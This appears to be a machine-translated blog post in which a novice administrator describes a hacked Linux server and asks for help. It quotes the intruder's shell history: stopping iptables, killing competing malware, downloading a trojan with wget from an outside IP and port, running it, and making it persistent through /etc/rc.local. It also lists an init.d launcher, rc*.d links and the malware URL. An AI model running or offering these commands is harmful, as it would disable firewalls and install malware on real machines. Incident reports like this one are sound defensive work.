Yesterday the company a server suddenly can not ping,ssh, from the IDC feedback said the server outsourcing, the number of large, CPU status display 200%. Viewing the following process files via PS aux is an exception file:
./liun2.3/tmp/liun2.3/tmp/liun2.3hzzta.pl
It was just beginning to think that killing these processes and deleting the execution files was possible, but after a few minutes, the program continued to execute.
Well, go to crontab-l to see if there are any scheduled tasks, No.
More/etc/crontab See if there are any scheduled tasks defined here. Also no
Think of, since the implementation of the file, then on the. Bash_history is it due to the record?
cdmore .bash_history/etc/init.d/iptables stopchmod 0775 /usr/bin/nohupchmod 0775 /usr/bin/killallchmod 0775 /usr/bin/rmkillall java-2013killall wins2killall Liun2.1killall liun2.0rm -f -r /etc/winsrm -f -r /etc/java-2013rm -f -r /etc/java-2013/java-2013rm -f -r /etc/liun2.1/liun2.1rm -f -r /etc /liun2.1mkdir /etc/liun2.1cd /. /tmpwget http://60.174.234.107:1974/liun2.3chmod 0755 liun2.3chmod 0755 ./liun2.3./ liun2.3echo "cd /. /tmp ">>/etc/rc.localecho " chmod 0755 liun2.3 ">>/etc/rc.localecho " chmod 0755 ./liun2.3 ">>/etc/rc.localecho "./liun2.3 ">>/etc/rc.local/etc/init.d/iptables stopchmod 0775 /usr/bin/nohupchmod 0775 /usr/bin/killallchmod 0775 /usr/bin/ Rmkillall java-2013killall wins2killall liun2.1killall liun2.0rm -f -r /etc/winsrm -f -r /etc/java-2013rm -f -r /etc/java-2013/java-2013rm -f -r /etc/liun2.1/liun2.1rm -f -r /etc/liun2.1mkdir /etc/liun2.1cd /. /tmpwget http://60.174.234.107:1974/liun2.3chmod 0755 liun2.3chmod 0755 ./liun2.3./ liun2.3echo "cd /. /tmp ">>/etc/rc.localecho " chmod 0755 liun2.3 ">>/etc/rc.localecho " chmod 0755 ./liun2.3 ">>/etc/rc.localecho "./liun2.3 ">>/etc/rc.local
Above is the operation in the invasion.
See
wget http://60.174.234.107:1974/liun2.3
Go directly to download the Trojan horse program.
Further search, found in the INIT.D directory a Trojan launcher program: DBSECURITYSPT
And in Rc1.d, RC2.D, RC3.D, rc4.d, RC5.D, RC6.D set up a link to init.d directory DBSECURITYSPT
Create a SGB executable under/usr/bin/
Finally, when looking for a file such as liun*, found in the Tomcat/webapps directory found liun2.3, liun2.3h such files.
Initially identified as a tomcat vulnerability, the security checks are performed on Tomcat, and the services that have been attacked are disabled and some port numbers are modified.
Now the service is running, but is there a back door to the back door? How did my server get hacked? I know nothing, I was halfway to learn Linux, for Linux security knowledge Lack, the purpose of this blog is to find out if there are no friends also encounter such attacks, this site is a trojan, http:// 60.174.234.107:1974, have a master see this blog please help how to find out this backdoor, or infected files.
This article is from "Fat notes" blog, please make sure to keep this source http://pangz.blog.51cto.com/1865802/1433461
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
